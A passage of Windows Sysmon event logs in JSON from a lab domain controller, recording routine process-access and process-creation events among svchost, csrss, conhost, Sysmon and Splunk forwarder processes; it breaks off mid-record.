{"EventTime":"2020-08-01 05:46:54","Hostname":"win-dc-881393.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":10,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":3,"Task":10,"OpcodeValue":0,"RecordNumber":2278,"ProcessID":2740,"ThreadID":3440,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process accessed:\r\nRuleName: \r\nUtcTime: 2020-08-01 05:46:54.203\r\nSourceProcessGUID: {A837DB8D-01B5-5F25-0000-0010B4650000}\r\nSourceProcessId: 612\r\nSourceThreadId: 1072\r\nSourceImage: C:\\Windows\\system32\\svchost.exe\r\nTargetProcessGUID: {A837DB8D-01C5-5F25-0000-00105CBB0200}\r\nTargetProcessId: 2740\r\nTargetImage: C:\\Windows\\sysmon64.exe\r\nGrantedAccess: 0x1400\r\nCallTrace: C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+5eab4|c:\\windows\\system32\\lsm.dll+12343|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","Category":"Process accessed (rule: ProcessAccess)","Opcode":"Info","UtcTime":"2020-08-01 05:46:54.203","SourceProcessGUID":"{A837DB8D-01B5-5F25-0000-0010B4650000}","SourceProcessId":"612","SourceThreadId":"1072","SourceImage":"C:\\Windows\\system32\\svchost.exe","TargetProcessGUID":"{A837DB8D-01C5-5F25-0000-00105CBB0200}","TargetProcessId":"2740","TargetImage":"C:\\Windows\\sysmon64.exe","GrantedAccess":"0x1400","CallTrace":"C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+5eab4|c:\\windows\\system32\\lsm.dll+12343|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","EventReceivedTime":"2020-08-01 05:46:55","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 05:46:54","Hostname":"win-dc-881393.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":10,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":3,"Task":10,"OpcodeValue":0,"RecordNumber":2279,"ProcessID":2740,"ThreadID":3440,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process accessed:\r\nRuleName: \r\nUtcTime: 2020-08-01 05:46:54.203\r\nSourceProcessGUID: {A837DB8D-01B5-5F25-0000-0010B4650000}\r\nSourceProcessId: 612\r\nSourceThreadId: 1072\r\nSourceImage: C:\\Windows\\system32\\svchost.exe\r\nTargetProcessGUID: {A837DB8D-01C5-5F25-0000-00105CBB0200}\r\nTargetProcessId: 2740\r\nTargetImage: C:\\Windows\\sysmon64.exe\r\nGrantedAccess: 0x1400\r\nCallTrace: C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+5eab4|c:\\windows\\system32\\lsm.dll+11378|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","Category":"Process accessed (rule: ProcessAccess)","Opcode":"Info","UtcTime":"2020-08-01 05:46:54.203","SourceProcessGUID":"{A837DB8D-01B5-5F25-0000-0010B4650000}","SourceProcessId":"612","SourceThreadId":"1072","SourceImage":"C:\\Windows\\system32\\svchost.exe","TargetProcessGUID":"{A837DB8D-01C5-5F25-0000-00105CBB0200}","TargetProcessId":"2740","TargetImage":"C:\\Windows\\sysmon64.exe","GrantedAccess":"0x1400","CallTrace":"C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+5eab4|c:\\windows\\system32\\lsm.dll+11378|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","EventReceivedTime":"2020-08-01 05:46:55","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 05:46:54","Hostname":"win-dc-881393.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":10,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":3,"Task":10,"OpcodeValue":0,"RecordNumber":2280,"ProcessID":2740,"ThreadID":3440,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process accessed:\r\nRuleName: \r\nUtcTime: 2020-08-01 05:46:54.203\r\nSourceProcessGUID: {A837DB8D-01B5-5F25-0000-0010B4650000}\r\nSourceProcessId: 612\r\nSourceThreadId: 1072\r\nSourceImage: C:\\Windows\\system32\\svchost.exe\r\nTargetProcessGUID: {A837DB8D-01C5-5F25-0000-00105CBB0200}\r\nTargetProcessId: 2740\r\nTargetImage: C:\\Windows\\sysmon64.exe\r\nGrantedAccess: 0x1400\r\nCallTrace: C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+5eab4|c:\\windows\\system32\\lsm.dll+11dcd|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","Category":"Process accessed (rule: ProcessAccess)","Opcode":"Info","UtcTime":"2020-08-01 05:46:54.203","SourceProcessGUID":"{A837DB8D-01B5-5F25-0000-0010B4650000}","SourceProcessId":"612","SourceThreadId":"1072","SourceImage":"C:\\Windows\\system32\\svchost.exe","TargetProcessGUID":"{A837DB8D-01C5-5F25-0000-00105CBB0200}","TargetProcessId":"2740","TargetImage":"C:\\Windows\\sysmon64.exe","GrantedAccess":"0x1400","CallTrace":"C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+5eab4|c:\\windows\\system32\\lsm.dll+11dcd|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","EventReceivedTime":"2020-08-01 05:46:55","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 05:46:54","Hostname":"win-dc-881393.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":10,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":3,"Task":10,"OpcodeValue":0,"RecordNumber":2281,"ProcessID":2740,"ThreadID":3440,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process accessed:\r\nRuleName: \r\nUtcTime: 2020-08-01 05:46:54.203\r\nSourceProcessGUID: {A837DB8D-01B5-5F25-0000-0010B4650000}\r\nSourceProcessId: 612\r\nSourceThreadId: 1072\r\nSourceImage: C:\\Windows\\system32\\svchost.exe\r\nTargetProcessGUID: {A837DB8D-01C5-5F25-0000-00105CBB0200}\r\nTargetProcessId: 2740\r\nTargetImage: C:\\Windows\\sysmon64.exe\r\nGrantedAccess: 0x1400\r\nCallTrace: C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+5eab4|c:\\windows\\system32\\lsm.dll+ecf6|c:\\windows\\system32\\lsm.dll+d6ce|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","Category":"Process accessed (rule: ProcessAccess)","Opcode":"Info","UtcTime":"2020-08-01 05:46:54.203","SourceProcessGUID":"{A837DB8D-01B5-5F25-0000-0010B4650000}","SourceProcessId":"612","SourceThreadId":"1072","SourceImage":"C:\\Windows\\system32\\svchost.exe","TargetProcessGUID":"{A837DB8D-01C5-5F25-0000-00105CBB0200}","TargetProcessId":"2740","TargetImage":"C:\\Windows\\sysmon64.exe","GrantedAccess":"0x1400","CallTrace":"C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+5eab4|c:\\windows\\system32\\lsm.dll+ecf6|c:\\windows\\system32\\lsm.dll+d6ce|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","EventReceivedTime":"2020-08-01 05:46:55","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 05:46:54","Hostname":"win-dc-881393.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":10,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":3,"Task":10,"OpcodeValue":0,"RecordNumber":2282,"ProcessID":2740,"ThreadID":3440,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process accessed:\r\nRuleName: \r\nUtcTime: 2020-08-01 05:46:54.203\r\nSourceProcessGUID: {A837DB8D-01C6-5F25-0000-0010F1650300}\r\nSourceProcessId: 3776\r\nSourceThreadId: 3796\r\nSourceImage: C:\\Windows\\system32\\conhost.exe\r\nTargetProcessGUID: {A837DB8D-01CE-5F25-0000-001026160400}\r\nTargetProcessId: 3848\r\nTargetImage: C:\\Program Files\\SplunkUniversalForwarder\\bin\\splunk-admon.exe\r\nGrantedAccess: 0x1FFFFF\r\nCallTrace: C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\SYSTEM32\\ConhostV2.dll+5c07|C:\\Windows\\SYSTEM32\\ConhostV2.dll+76ab|C:\\Windows\\SYSTEM32\\ConhostV2.dll+a84c|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","Category":"Process accessed (rule: ProcessAccess)","Opcode":"Info","UtcTime":"2020-08-01 05:46:54.203","SourceProcessGUID":"{A837DB8D-01C6-5F25-0000-0010F1650300}","SourceProcessId":"3776","SourceThreadId":"3796","SourceImage":"C:\\Windows\\system32\\conhost.exe","TargetProcessGUID":"{A837DB8D-01CE-5F25-0000-001026160400}","TargetProcessId":"3848","TargetImage":"C:\\Program Files\\SplunkUniversalForwarder\\bin\\splunk-admon.exe","GrantedAccess":"0x1fffff","CallTrace":"C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\SYSTEM32\\ConhostV2.dll+5c07|C:\\Windows\\SYSTEM32\\ConhostV2.dll+76ab|C:\\Windows\\SYSTEM32\\ConhostV2.dll+a84c|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","EventReceivedTime":"2020-08-01 05:46:55","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 05:46:54","Hostname":"win-dc-881393.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":10,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":3,"Task":10,"OpcodeValue":0,"RecordNumber":2283,"ProcessID":2740,"ThreadID":3440,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process accessed:\r\nRuleName: \r\nUtcTime: 2020-08-01 05:46:54.359\r\nSourceProcessGUID: {A837DB8D-01CE-5F25-0000-001026160400}\r\nSourceProcessId: 3848\r\nSourceThreadId: 3872\r\nSourceImage: C:\\Program Files\\SplunkUniversalForwarder\\bin\\splunk-admon.exe\r\nTargetProcessGUID: {A837DB8D-01C5-5F25-0000-0010C3C30200}\r\nTargetProcessId: 3088\r\nTargetImage: C:\\Program Files\\SplunkUniversalForwarder\\bin\\splunkd.exe\r\nGrantedAccess: 0x101400\r\nCallTrace: C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+221bd|C:\\Program Files\\SplunkUniversalForwarder\\bin\\splunk-admon.exe+6025c5|C:\\Program Files\\SplunkUniversalForwarder\\bin\\splunk-admon.exe+6020f6|C:\\Program Files\\SplunkUniversalForwarder\\bin\\splunk-admon.exe+59e67|C:\\Program Files\\SplunkUniversalForwarder\\bin\\splunk-admon.exe+5b88c|C:\\Program Files\\SplunkUniversalForwarder\\bin\\splunk-admon.exe+8e7d70|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","Category":"Process accessed (rule: ProcessAccess)","Opcode":"Info","UtcTime":"2020-08-01 05:46:54.359","SourceProcessGUID":"{A837DB8D-01CE-5F25-0000-001026160400}","SourceProcessId":"3848","SourceThreadId":"3872","SourceImage":"C:\\Program Files\\SplunkUniversalForwarder\\bin\\splunk-admon.exe","TargetProcessGUID":"{A837DB8D-01C5-5F25-0000-0010C3C30200}","TargetProcessId":"3088","TargetImage":"C:\\Program Files\\SplunkUniversalForwarder\\bin\\splunkd.exe","GrantedAccess":"0x101400","CallTrace":"C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+221bd|C:\\Program Files\\SplunkUniversalForwarder\\bin\\splunk-admon.exe+6025c5|C:\\Program Files\\SplunkUniversalForwarder\\bin\\splunk-admon.exe+6020f6|C:\\Program Files\\SplunkUniversalForwarder\\bin\\splunk-admon.exe+59e67|C:\\Program Files\\SplunkUniversalForwarder\\bin\\splunk-admon.exe+5b88c|C:\\Program Files\\SplunkUniversalForwarder\\bin\\splunk-admon.exe+8e7d70|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","EventReceivedTime":"2020-08-01 05:46:55","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 05:46:55","Hostname":"win-dc-881393.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":1,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":5,"Task":1,"OpcodeValue":0,"RecordNumber":2284,"ProcessID":2740,"ThreadID":3440,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process Create:\r\nRuleName: \r\nUtcTime: 2020-08-01 05:46:54.880\r\nProcessGuid: {A837DB8D-01CE-5F25-0000-0010FC170400}\r\nProcessId: 3856\r\nImage: C:\\Program Files\\SplunkUniversalForwarder\\bin\\splunk-netmon.exe\r\nFileVersion: 8.0.2\r\nDescription: Network monitor\r\nProduct: Splunk Application\r\nCompany: Splunk Inc.\r\nOriginalFileName: splunk-netmon.exe\r\nCommandLine: \"C:\\Program Files\\SplunkUniversalForwarder\\bin\\splunk-netmon.exe\"\r\nCurrentDirectory: C:\\Windows\\system32\\\r\nUser: NT AUTHORITY\\SYSTEM\r\nLogonGuid: {A837DB8D-01B3-5F25-0000-0020E7030000}\r\nLogonId: 0x3E7\r\nTerminalSessionId: 0\r\nIntegrityLevel: System\r\nHashes: MD5=8746B8C1724B67C2B1261446C0CFAA57,SHA256=7EFD09FD383FAA75C5D2990E6DBBFD846AEAA08B7037C7D66B4A0EF2AE0866B3,IMPHASH=7B985F47B35272AD7B5218255ACE7AEC\r\nParentProcessGuid: {A837DB8D-01C5-5F25-0000-0010C3C30200}\r\nParentProcessId: 3088\r\nParentImage: C:\\Program Files\\SplunkUniversalForwarder\\bin\\splunkd.exe\r\nParentCommandLine: \"C:\\Program Files\\SplunkUniversalForwarder\\bin\\splunkd.exe\" service","Category":"Process Create (rule: ProcessCreate)","Opcode":"Info","UtcTime":"2020-08-01 05:46:54.880","ProcessGuid":"{A837DB8D-01CE-5F25-0000-0010FC170400}","Image":"C:\\Program Files\\SplunkUniversalForwarder\\bin\\splunk-netmon.exe","FileVersion":"8.0.2","Description":"Network monitor","Product":"Splunk Application","Company":"Splunk Inc.","OriginalFileName":"splunk-netmon.exe","CommandLine":"\"C:\\Program Files\\SplunkUniversalForwarder\\bin\\splunk-netmon.exe\"","CurrentDirectory":"C:\\Windows\\system32\\","User":"NT AUTHORITY\\SYSTEM","LogonGuid":"{A837DB8D-01B3-5F25-0000-0020E7030000}","LogonId":"0x3e7","TerminalSessionId":"0","IntegrityLevel":"System","Hashes":"MD5=8746B8C1724B67C2B1261446C0CFAA57,SHA256=7EFD09FD383FAA75C5D2990E6DBBFD846AEAA08B7037C7D66B4A0EF2AE0866B3,IMPHASH=7B985F47B35272AD7B5218255ACE7AEC","ParentProcessGuid":"{A837DB8D-01C5-5F25-0000-0010C3C30200}","ParentProcessId":"3088","ParentImage":"C:\\Program Files\\SplunkUniversalForwarder\\bin\\splunkd.exe","ParentCommandLine":"\"C:\\Program Files\\SplunkUniversalForwarder\\bin\\splunkd.exe\" service","EventReceivedTime":"2020-08-01 05:46:55","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 05:46:55","Hostname":"win-dc-881393.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":10,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":3,"Task":10,"OpcodeValue":0,"RecordNumber":2285,"ProcessID":2740,"ThreadID":3440,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process accessed:\r\nRuleName: \r\nUtcTime: 2020-08-01 05:46:55.062\r\nSourceProcessGUID: {A837DB8D-01C5-5F25-0000-0010C3C30200}\r\nSourceProcessId: 3088\r\nSourceThreadId: 4056\r\nSourceImage: C:\\Program Files\\SplunkUniversalForwarder\\bin\\splunkd.exe\r\nTargetProcessGUID: {A837DB8D-01CE-5F25-0000-0010FC170400}\r\nTargetProcessId: 3856\r\nTargetImage: C:\\Program Files\\SplunkUniversalForwarder\\bin\\splunk-netmon.exe\r\nGrantedAccess: 0x1FFFFF\r\nCallTrace: C:\\Windows\\SYSTEM32\\ntdll.dll+a7194|C:\\Windows\\System32\\KERNELBASE.dll+2b860|C:\\Windows\\System32\\KERNELBASE.dll+6b246|C:\\Windows\\System32\\KERNEL32.DLL+1c213|C:\\Program Files\\SplunkUniversalForwarder\\bin\\splunkd.exe+ce6a3b|C:\\Program Files\\SplunkUniversalForwarder\\bin\\splunkd.exe+17cade|C:\\Program Files\\SplunkUniversalForwarder\\bin\\splunkd.exe+18641d|C:\\Program Files\\SplunkUniversalForwarder\\bin\\splunkd.exe+17ef16|C:\\Program Files\\SplunkUniversalForwarder\\bin\\splunkd.exe+c992c4|C:\\Program Files\\SplunkUniversalForwarder\\bin\\splunkd.exe+18689b|C:\\Program Files\\SplunkUniversalForwarder\\bin\\splunkd.exe+189d3c|C:\\Program Files\\SplunkUniversalForwarder\\bin\\splunkd.exe+c95f5f|C:\\Program Files\\SplunkUniversalForwarder\\bin\\splunkd.exe+c99fad|C:\\Program Files\\SplunkUniversalForwarder\\bin\\splunkd.exe+184c5b|C:\\Program Files\\SplunkUniversalForwarder\\bin\\splunkd.exe+c7dd7e|C:\\Windows\\System32\\ucrtbase.dll+1fb80|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","Category":"Process accessed (rule: ProcessAccess)","Opcode":"Info","UtcTime":"2020-08-01 05:46:55.062","SourceProcessGUID":"{A837DB8D-01C5-5F25-0000-0010C3C30200}","SourceProcessId":"3088","SourceThreadId":"4056","SourceImage":"C:\\Program Files\\SplunkUniversalForwarder\\bin\\splunkd.exe","TargetProcessGUID":"{A837DB8D-01CE-5F25-0000-0010FC170400}","TargetProcessId":"3856","TargetImage":"C:\\Program Files\\SplunkUniversalForwarder\\bin\\splunk-netmon.exe","GrantedAccess":"0x1fffff","CallTrace":"C:\\Windows\\SYSTEM32\\ntdll.dll+a7194|C:\\Windows\\System32\\KERNELBASE.dll+2b860|C:\\Windows\\System32\\KERNELBASE.dll+6b246|C:\\Windows\\System32\\KERNEL32.DLL+1c213|C:\\Program Files\\SplunkUniversalForwarder\\bin\\splunkd.exe+ce6a3b|C:\\Program Files\\SplunkUniversalForwarder\\bin\\splunkd.exe+17cade|C:\\Program Files\\SplunkUniversalForwarder\\bin\\splunkd.exe+18641d|C:\\Program Files\\SplunkUniversalForwarder\\bin\\splunkd.exe+17ef16|C:\\Program Files\\SplunkUniversalForwarder\\bin\\splunkd.exe+c992c4|C:\\Program Files\\SplunkUniversalForwarder\\bin\\splunkd.exe+18689b|C:\\Program Files\\SplunkUniversalForwarder\\bin\\splunkd.exe+189d3c|C:\\Program Files\\SplunkUniversalForwarder\\bin\\splunkd.exe+c95f5f|C:\\Program Files\\SplunkUniversalForwarder\\bin\\splunkd.exe+c99fad|C:\\Program Files\\SplunkUniversalForwarder\\bin\\splunkd.exe+184c5b|C:\\Program Files\\SplunkUniversalForwarder\\bin\\splunkd.exe+c7dd7e|C:\\Windows\\System32\\ucrtbase.dll+1fb80|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","EventReceivedTime":"2020-08-01 05:46:55","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 05:46:55","Hostname":"win-dc-881393.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":10,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":3,"Task":10,"OpcodeValue":0,"RecordNumber":2286,"ProcessID":2740,"ThreadID":3440,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process accessed:\r\nRuleName: \r\nUtcTime: 2020-08-01 05:46:55.062\r\nSourceProcessGUID: {A837DB8D-01B3-5F25-0000-0010D8420000}\r\nSourceProcessId: 648\r\nSourceThreadId: 664\r\nSourceImage: C:\\Windows\\system32\\csrss.exe\r\nTargetProcessGUID: {A837DB8D-01CE-5F25-0000-0010FC170400}\r\nTargetProcessId: 3856\r\nTargetImage: C:\\Program Files\\SplunkUniversalForwarder\\bin\\splunk-netmon.exe\r\nGrantedAccess: 0x1FFFFF\r\nCallTrace: C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\system32\\basesrv.DLL+2f47|C:\\Windows\\SYSTEM32\\CSRSRV.dll+5645|C:\\Windows\\SYSTEM32\\ntdll.dll+6e87f","Category":"Process accessed (rule: ProcessAccess)","Opcode":"Info","UtcTime":"2020-08-01 05:46:55.062","SourceProcessGUID":"{A837DB8D-01B3-5F25-0000-0010D8420000}","SourceProcessId":"648","SourceThreadId":"664","SourceImage":"C:\\Windows\\system32\\csrss.exe","TargetProcessGUID":"{A837DB8D-01CE-5F25-0000-0010FC170400}","TargetProcessId":"3856","TargetImage":"C:\\Program 